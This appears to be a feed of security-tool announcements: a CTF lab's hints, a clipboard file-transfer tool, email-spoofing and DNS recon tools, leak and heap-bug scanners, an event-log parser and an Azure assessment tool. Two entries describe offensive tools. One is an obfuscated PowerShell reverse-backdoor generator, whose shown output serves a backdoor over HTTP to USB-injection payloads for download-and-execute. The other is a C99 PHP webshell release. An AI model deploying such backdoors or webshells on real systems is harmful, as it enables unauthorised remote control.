  • The SSTI is blind, which means that the output of the code executed on the server is not obtained directly. The Python smtpd module allows you to create an SMTP server that prints the messages it receives to standard output:

    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

  • The application uses Flask, so it can be inferred that the template engine is Jinja2 because it is recommended by the official Flask documentation and is widely used. You must get a Jinja2 compatible payload to get the final flag.

  • The email message has a character limitation. Information on how to bypass this limitation can be found on the Internet.

Solutions

Detailed solutions for each stage can be found in the Solutions folder.

Resources

The following resources may be helpful in resolving the stages:

Collaboration

Pull requests are welcome. If you find any bugs, please open an issue.



Invoke-Transfer - PowerShell Clipboard Data Transfer

Invoke-Transfer

Invoke-Transfer is a PowerShell Clipboard Data Transfer.

This tool helps you to send files in highly restricted environments such as Citrix, RDP, VNC, Guacamole.. using the clipboard function.

As long as you can send text through the clipboard, you can send files in text format, in small Base64 encoded chunks. Additionally, you can transfer files from a screenshot, using the native OCR function of Microsoft Windows.

Requirements

  • Powershell 5.1
  • Windows 10 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Invoke-Transfer

Usage

.\Invoke-Transfer.ps1 -h

___ _ _____ __
|_ _|_ __ _ __ __ | | __ __ |_ _| __ __ _ _ __ ___ / _| ___ _ __
| || '_ \ \ / / _ \| |/ / _ \____| || '__/ _' | '_ \/ __| |_ / _ \ '__|
| || | | \ V / (_) | < __/____| || | | (_| | | | \__ \ _| __/ |
|___|_| |_|\_/ \___/|_|\_\___| |_||_| \__,_|_| |_|___/_| \___|_|

----------------------- by @JoelGMSec & @3v4Si0N ---------------------


Info: This tool helps you to send files in highly restricted environments
such as Citrix, RDP, VNC, Guacamole... using the clipboard function

Usage: .\Invoke-Transfer.ps1 -split {FILE} -sec {SECONDS}
Send 120KB chunks with a set time delay of seconds
Add -guaca to send files through Apache Guacamole

.\Invoke-Transfer.ps1 -merge {B64FILE} -out {FILE}
Merge Base64 file into original file in desired path

.\Invoke-Transfer.ps1 -read {IMGFILE} -out {FILE}
Read screenshot with Windows OCR and save output to file

Warning: This tool only works on Windows 10 or greater
OCR reading may not be entirely accurate

The detailed guide of use can be found at the following link:

https://darkbyte.net/transfiriendo-ficheros-en-entornos-restringidos-con-invoke-transfer

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec) and Héctor de Armas Padrón (@3v4si0n).

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find us on Twitter as @JoelGMSec, @3v4si0n and on my blog darkbyte.net.



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerability Of Domains


Verify whether a domain is vulnerable to email spoofing with Email-Vulnerablity-Checker.

Features

  • This tool automatically tells you whether the domain is spoofable or not (see the sketch after this list)
  • You can check a single domain or multiple domains (for the multiple-domain checker, you need a text file with the domains in it)
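
The kind of check involved can be sketched with dig (which is installed in the steps below). This is only an illustration of looking up SPF and DMARC records, not the exact logic of spfvuln.sh:

import subprocess

def dig_txt(name: str) -> list[str]:
    # Uses the dig binary installed in the steps below.
    out = subprocess.run(["dig", "+short", "TXT", name],
                         capture_output=True, text=True).stdout
    return [line.strip().strip('"') for line in out.splitlines() if line.strip()]

domain = "example.com"  # hypothetical target
spf = [r for r in dig_txt(domain) if r.lower().startswith("v=spf1")]
dmarc = [r for r in dig_txt(f"_dmarc.{domain}") if r.lower().startswith("v=dmarc1")]

# A domain with no SPF record, or no DMARC policy, is a likely spoofing candidate.
print("SPF:", spf or "none found")
print("DMARC:", dmarc or "none found")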

Usage:

Clone the package by running:

git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

Step 1. Install Requirements

# Update the package list and install dig for Debian-based Linux distribution 
sudo apt update
sudo apt install dnsutils

# Install dig for CentOS
sudo yum install bind-utils

# Install dig for macOS
brew install dig

Step 2. Finish The Installation

To use Email-Vulnerablity-Checker, type the following commands in the terminal:

apt install git -y 
apt install dig -y
git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
cd Email-Vulnerablity-Checker
chmod 777 spfvuln.sh

Run the email vulnerability checker by just typing:

./spfvuln.sh -h

Support

For Queries: Telegram
Contributions, issues, and feature requests are welcome!
Give a ★ if you like this project!



DNSrecon-gui - DNSrecon Tool With GUI For Kali Linux


DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX) and top-level domain expansion for a defined domain.
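
For reference, the standard record types that DNSRecon enumerates can be queried directly with dnspython; this is an illustration only and not part of dnsrecon-gui (dnspython is an assumed extra dependency):

import dns.resolver  # assumed dependency, installed separately

domain = "example.com"  # hypothetical target
for rtype in ("A", "NS", "SOA", "MX"):
    try:
        for answer in dns.resolver.resolve(domain, rtype):
            print(f"{rtype}: {answer.to_text()}")
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        print(f"{rtype}: no record")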

With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.

Install

git clone https://github.com/micro-joan/dnsrecon-gui
cd dnsrecon-gui/
chmod +x run.sh
./run.sh

After executing the application launcher, you need to have all the components installed; the launcher will check them one by one, and if any component is not installed it will show you the command you must enter to install it:


Use

When the tool is ready to use, the installer will give you a URL that you must open in the browser in a private window; every time you do a search you will have to open a new private window or clear your browser cache to refresh the graphics.

Tools

Service Functions Status
Text2MindMap Convert text to mindmap ✅ Free
dnsenum DNS information gathering ✅ Free

My website: https://microjoan.com
My blog: https://darkhacking.es/
Buy me a coffee: https://www.buymeacoffee.com/microjoan

DISCLAIMER

This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing this in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!


Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in PowerShell and obfuscated with Python, allowing the backdoor to have a new signature after every run. It can also generate autorun scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Interesting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up an HTTP server hosting the backdoor. Once the backdoor is retrieved, the HTTP server will be shut down.

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g. powershell_backdoor.txt) onto your Flipper Zero. When the payload is executed, it will download and execute backdoor.ps1.

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Leaktopus - Keep Your Source Code Under Control

Keep your source code under control.

Key Features

  • Plug&Play - one line installation with Docker.

  • Scan various sources containing a set of keywords, e.g. ORGANIZATION-NAME.com.

    Currently supports:

    • GitHub
      • Repositories
      • Gists (coming soon)
    • Paste sites (e.g., PasteBin) (coming soon)
  • Filter results with a built-in heuristic engine.

  • Enhance results with IOLs (Indicators Of Leak):

    • Secrets in the found sources (including Git repos commits history):
    • URIs (Including indication of your organization's domains)
    • Emails (Including indication of your organization's email addresses)
    • Contributors
    • Sensitive keywords (e.g., canary token, internal domains)
  • Allows ignoring public sources (e.g., "junk" repositories by web crawlers).

  • OOTB ignore list of common "junk" sources.

  • Acknowledge a leak, and only get notified if the source has been modified since the previous scan.

  • Built-in ELK to search for data in leaks (including full index of Git repositories with IOLs).

  • Notify on new leaks

    • MS Teams Webhook.
    • Slack Bot.
    • Cortex XSOAR® (by Palo Alto Networks) Integration (WIP).

Technology Stack

  • Fully Dockerized.
  • API-first Python Flask backend.
  • Decoupled Vue.js (3.x) frontend.
  • SQLite DB.
  • Async tasks with Celery + Redis queues.

Prerequisites

  • Docker-Compose

Installation

  • Clone the repository
  • Create a local .env file
    cd Leaktopus
    cp .env.example .env
  • Edit .env according to your local setup (see the internal comments).
  • Run Leaktopus
    docker-compose up -d
  • Initiate the installation sequence by accessing the installation API. Just open http://{LEAKTOPUS_HOST}:8000/api/install in your browser.
  • Check that the API is up and running at http://{LEAKTOPUS_HOST}:8000/up
  • The UI should be available at http://{LEAKTOPUS_HOST}:8080

Using Github App

In addition to the basic personal access token option, Leaktopus supports Github App authentication. Using Github App is recommended due to the increased rate limits.

  1. To use Github App authentication, you need to create a Github App and install it on your organization/account. See Github's documentation for more details.

  2. After creating the app, you need to set the following environment variables:

    • GITHUB_USE_APP=True
    • GITHUB_APP_ID
    • GITHUB_INSTALLATION_ID - The installation id can be found in your app installation.
    • GITHUB_APP_PRIVATE_KEY_PATH (defaults to /app/private-key.pem)
  3. Mount the private key file to the container (see docker-compose.yml for an example). ./leaktopus_backend/private-key.pem:/app/private-key.pem

* Note that GITHUB_ACCESS_TOKEN will be ignored if GITHUB_USE_APP is set to True.

Updating Leaktopus

If you wish to update your Leaktopus version (pulling a newer version), just follow the next steps.

  • Pull the latest version.
    git pull
  • Rebuild Docker images (data won't be deleted).
    # Force image recreation
    docker-compose up --force-recreate --build
  • Run the DB update by calling its API (should be required after some updates). http://{LEAKTOPUS_HOST}/api/updatedb

Results Filtering Heuristic Engine

The built-in heuristic engine filters the search results to reduce false positives by:

  • Content:
    • More than X emails containing non-organizational domains.
    • More than X URIs containing non-organizational domains.
  • Metadata:
    • More than X stars.
    • More than X forks.
  • Sources ignore list.

API Documentation

OpenAPI documentation is available at http://{LEAKTOPUS_HOST}:8000/apidocs.

Leaktopus Services

Service Port Mandatory/Optional
Backend (API) 8000 Mandatory
Backend (Worker) N/A Mandatory
Redis 6379 Mandatory
Frontend 8080 Optional
Elasticsearch 9200 Optional
Logstash 5000 Optional
Kibana 5601 Optional

The above can be customized by using a custom docker-compose.yml file.

Security Notes

As for now, Leaktopus does not provide any authentication mechanism. Make sure that you are not exposing it to the world, and doing your best to restrict access to your Leaktopus instance(s).

Contributing

Contributions are very welcome.

Please follow our contribution guidelines and documentation.



C99Shell-PHP7 - PHP 7 And Safe-Build Update Of The Popular C99 Variant Of PHP Shell


C99Shell-PHP7

PHP 7 and safe-build Update of the popular C99 variant of PHP Shell.

c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7

About C99Shell

An excellent example of a web shell is the c99 variant, which is a PHP shell (most call it malware) often uploaded to a vulnerable web application to give hackers an interface. The c99 shell lets the attacker take control of the processes of the Internet server, allowing him or her to give commands on the server as the account under which the threat is operating. It lets the hacker upload files, browse the file system, edit and view files, as well as delete them, move them and change permissions. Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long if packed and 4900+ if properly displayed, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, and a place where the attacker can run custom PHP code (PHP malware c99 shell).

There are different variants of the c99 shell that are being used today. This github release is an example of a relatively recent one. It has many signatures that can be utilized to write protective countermeasures.


About this release:

I've been using PHP shells as part of my ethical hacking activities, and I have noticed that most of the PHP shells downloadable online are encrypted with malicious code; without you knowing, others also insert trackers so they can see where you placed your PHP shell.

I came up with an idea: "What if I get the stable version of c99shell, reverse the encrypted code, remove the malicious code, and release it to the public for good?" And yeah, I decided to do it, but I noticed that most servers have now upgraded their Apache service to PHP 7; sadly, the code that I had was for PHP 5.3 and below.

The good thing is... only a few lines of syntax needed to be altered, so I did it.

Here you go mates, a clean and safe-build version of the most stable c99shell that I can see.

If ever you see more bugs, please create an issue or just fork it, update it and do a pull request so I can check it and update the codes for stabilization.

PS:

This is a PHP shell widely used by hackers, so don't freak out if your anti-virus/anti-malware detects this PHP file as malicious or treats it as a backdoor. Since you can see the code in my re-released project, you can read through all of it and inspect or even debug it as much as you like.

Disclaimer:

I will NOT be held responsible for any unethical use of this hacking tool.

Official Release:

c99shell_v2.0.zip (Zip Password: PinoyWH1Z)



Darkdump2 - Search The Deep Web Straight From Your Terminal



About Darkdump (Recent Notice - 12/27/22)

Darkdump is a simple script written in Python 3.11 that allows users to enter a search term (query) on the command line, and darkdump will pull all the deep web sites relating to that query. Darkdump 2.0 is here, enjoy!

Installation

  1. git clone https://github.com/josh0xA/darkdump
  2. cd darkdump
  3. python3 -m pip install -r requirements.txt
  4. python3 darkdump.py --help

Usage

Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12

  • Note: The 'amount' argument filters the number of results outputted

Usage With Increased Anonymity

Darkdump Proxy: python3 darkdump.py --query bitcoin -p

Menu


____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|

Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0

usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]

options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity

Visual

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.

License

MIT License
Copyright (c) Josh Schiavone



Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C


This tool uses the taint analysis technique for static analysis and aims to identify heap memory usage vulnerabilities in the C and C++ languages. The tool uses a common approach in the first phase of static analysis, using tokenization to collect information.

The second phase takes a different approach from the common lessons of the legendary dragon book: the tool doesn't use an AST or resources like LLVM, nor does it follow the standard parser recipes. The present approach aims to study other ways to detect vulnerabilities, using custom vector structures and a typical recursive traversal with ranking of taint points. The sum of these techniques is Heap_detective.

The tool follows the KISS principle: "Keep it simple, stupid!". There's more than one way to build a SAST tool, I know that. Yes, I thought about using a graph database or an AST, but that would have broken the KISS principle in the context of this project.

https://antonio-cooler.gitbook.io/coolervoid-tavern/detecting-heap-memory-pitfalls


Features

  • C and C++ tokenizer
  • List of heap static routes for each source with taint points for analysis
  • Analyser to detect double free vulnerability
  • Analyser to detect use after free vulnerability
  • Analyser to detect memory leak

To test, read the samplers directory to understand the context; then run it as follows:

$ git clone https://github.com/CoolerVoid/heap_detective

$ cd heap_detective

$ make
// to run
$ bin/heap_detective samplers/
Note:
Don't try "$ cd bin; ./heap_detective"
The first argv is a directory for recursive analysis

Note: tested in GCC 9 and 11

The first command argument is a directory for recursive analysis. You can study bad practices in the "samplers" directory.

Future features

  • Analyser to detect off-by-one vulnerability
  • Analyser to detect wild pointer
  • Analyser to detect heap overflow vulnerability

Overview

Output example:




Collect action done

...::: Heap static route :::...
File path: samplers/example3.c
Func name: main
Var name: new
line: 10: array = new obj[100];
Sinks:
line: 10: array = new obj[100];
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example3.c
Func name: while
Var name: array
line: 27: array = malloc(1);
Sinks:
line: 27: array = malloc(1);
Taint: True
In Loop: false
line: 28: array=2;
Taint: false
In Loop: false
line: 30: array = malloc(3);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example5.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 12: free(ch_ptr);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example1.c
Func name: main
Var name: buf1R1
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Sinks:
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Taint: True
In Loop: false
line: 26: free(buf1R1);
Taint: True
In Loop: false
line: 30: if (buf1R1) {
Taint: false
In Loop: false
line: 31: free(buf1R1);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example2.c
Func name: main
Var name: ch_ptr
line: 7: ch_ptr=malloc(100);
Sinks:
line: 7: ch_ptr=malloc(100);
Taint: True
In Loop: false
line: 11: ch_ptr = 'A';
Taint: false
In Loop: True
line: 12: free(ch_ptr);
Taint: True
In Loop: True
line: 13: printf("%s\n", ch_ptr);
Taint: false
In Loop: True

...::: Heap static route :::...
File path: samplers/example4.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 13: ch_ptr = 'A';
Taint: false
In Loop: false
line: 14: free(ch_ptr);
Taint: True
In Loop: false
line: 15: printf("%s\n", ch_ptr);
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example6.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 13: ch_ptr = malloc(500);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: special
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 15: free(ch_ptr);
Taint: True
In Loop: false
line: 16: ch_ptr = malloc(500);
Taint: True
In Loop: false
line: 17: ch_ptr=NULL;
Taint: false
In Loop: false
line: 25: char *ch_ptr = NULL;
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: main
Var name: ch_ptr
line: 27: ch_ptr = malloc(100);
Sinks:
line: 27: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 30: free(ch_ptr);
Taint: True
In Loop: false
line: 32: ch_ptr = malloc(500);
Taint: True
In Loop: false

>>-----> Memory leak analyser

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: main
memory leak found!
line: 10: array = new obj[100];

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: while
memory leak found!
line: 27: array = malloc(1);
line: 28: array=2;
line: 30: array = malloc(3);

...::: Memory leak analyser :::...
File path: samplers/example5.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example1.c
Function name: main
memory leak found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Memory leak analyser :::...
File path: samplers/example2.c
Function name: main
memory leak found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example6.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: special
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: main
memory leak found!
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);

>>-----> Start double free analyser

...::: Double free analyser :::...
File path: samplers/example5.c
Function name: main
Double free found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Double free analyser :::...
File path: samplers/example1.c
Function name: main
Double free found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Double free analyser :::...
File path: samplers/example2.c
Function name: main
Double free found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

>>-----> Start use after free analyser

...::: Use after free analyser :::...
File path: samplers/example5.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example1.c
Function name: main
Use after free found
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Use after free analyser :::...
File path: samplers/example2.c
Function name: main
Use after free found
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example4.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 13: ch_ptr = 'A';
line: 14: free(ch_ptr);
line: 15: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example6.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: special
Use after free found
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: main
Use after free found
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);






Winevt_Logs_Analysis - Searching .Evtx Logs For Remote Connections


A simple script for finding remote connections to a Windows machine, and ideally some public IPs. It checks a number of EventIDs related to remote logins and sessions.

You should run pip install -r requirements.txt so the script can work and parse the .evtx files inside the winevt folder.


The winevt/Logs folder and the script must be located under the same file path.
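
For a rough idea of what such a check involves, here is a minimal sketch assuming the python-evtx package; the file path and the EventIDs shown (4624 = successful logon, 4778 = session reconnected) are common examples and may differ from the script's actual list.

import re
from Evtx.Evtx import Evtx  # pip install python-evtx

REMOTE_EVENT_IDS = {"4624", "4778"}

with Evtx("winevt/Logs/Security.evtx") as log:   # path is an assumption
    for record in log.records():
        xml = record.xml()
        event_id = re.search(r"<EventID[^>]*>(\d+)</EventID>", xml)
        if event_id and event_id.group(1) in REMOTE_EVENT_IDS:
            ip = re.search(r'<Data Name="IpAddress">([^<]+)</Data>', xml)
            print(event_id.group(1), ip.group(1) if ip else "-")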

Execution Example

Result Example



EAST - Extensible Azure Security Tool - Documentation


Extensible Azure Security Tool (later referred to as EAST) is a tool for assessing Azure and, to some extent, Azure AD security controls. The primary use case of EAST is security data collection for evaluation in Azure assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.


This tool is licensed under MIT license.




Collaborators

Release notes

  • Preview branch introduced

    Changes:

    • Installation now accounts for the use of Azure Cloud Shell's updated version with regard to dependencies (Cloud Shell now has Node.js v16 installed)

    • Checking of Databricks cluster types as per advisory

      • Audits Databricks clusters for potential privilege elevation. This control typically requires permissions on the Databricks cluster.
    • content.json now has key- and content-based sorting. This enables delta checks with git diff HEAD^1 ¹, as content.json has a predetermined order of results.

    ¹ Word of caution: if you want to check deltas of content.json, it will need to be "unignored" in .gitignore, exposing results to any upstream you might have configured.

    Use this feature with caution, and ensure you don't have a public upstream set for the branch you use it on.

  • Changed programming patterns to avoid possible race conditions with larger datasets. This is mostly a matter of switching from var to let in for await -style loops.


Important

Current status of the tool is beta
  • Fixes, updates etc. are done on a "best effort" basis, with no guarantee of timing or quality of the possible fix
  • We do some additional tuning before using EAST in our daily work, such as applying various run and environment restrictions, besides familiarizing ourselves with the environment in question. Thus we currently recommend that EAST be run only in test environments, and with read-only permissions.
    • All the calls in the service are largely to Azure cloud IPs, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could "phone home" without also having C2 in Azure.
      • Essentially, running it in read-only mode reduces a lot of the risk associated with possibly compromised NPM packages (Google "compromised NPM")
      • Bugs etc.: you can protect your environment against certain mistakes in this code by running the tool with read-only permissions
  • A lot of the code is "AS IS": meaning it has served only the purpose of creating a certain result; a lot of cleaning up and modularizing remains to be finished
  • There are no tests at the moment, apart from certain manual checks that are run after changes to main.js and various more advanced controls.
  • The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
  • As the name implies, we use it as a tool to evaluate environments. It is not meant to be run unmonitored for the time being, and should not be run on any internet-exposed service that accepts incoming connections.
  • Documentation could be described as incomplete for the time being
  • EAST is mostly focused on PaaS resources, as most of our Azure assessments focus on this resource type
  • No input sanitization is performed on launch parameters, as it is always assumed that the input of these parameters is controlled. That being said, the tool uses exec() extensively; while I have not reviewed all paths, I believe that achieving shell command execution is trivial. This tool does not assume hostile input, so the recommendation is that you don't paste launch arguments into the command line without reviewing them first.

Tool operation

Dependencies

To reduce the amount of code, the following dependencies are used for operation and aesthetics (kudos to the maintainers of these fantastic packages):

  • axios (MIT)
  • yargs (MIT)
  • jsonwebtoken (MIT)
  • chalk (MIT)
  • js-beautify (MIT)

Other dependencies for running the tool (if you are planning to run this in Azure Cloud Shell, you don't need to install Azure CLI):

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Azure Cloud Shell (BASH) or applicable Linux Distro / WSL

Requirement — description — install:

  • AZ CLI — AZCLI USE — curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
  • Node.js runtime 14 — Node.js runtime for EAST — install with NVM

Controls

EAST provides three categories of controls: Basic, Advanced, and Composite

The machine readable control looks like this, regardless of the type (Basic/advanced/composite):

{
"name": "fn-sql-2079",
"resource": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
"controlId": "managedIdentity",
"isHealthy": true,
"id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
"Description": "\r\n Ensure The Service calls downstream resources with managed identity",
"metadata": {
"principalId": {
"type": "SystemAssigned",
"tenantId": "033794f5-7c9d-4e98-923d-7b49114b7ac3",
"principalId": "cb073f1e-03bc-440e-874d-5ed3ce6df7f8"
},
"roles": [{
"role": [{
"properties": {
"roleDefinitionId": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c",
"principalId": "cb073f1e-03b c-440e-874d-5ed3ce6df7f8",
"scope": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079",
"createdOn": "2021-12-27T06:03:09.7052113Z",
"updatedOn": "2021-12-27T06:03:09.7052113Z",
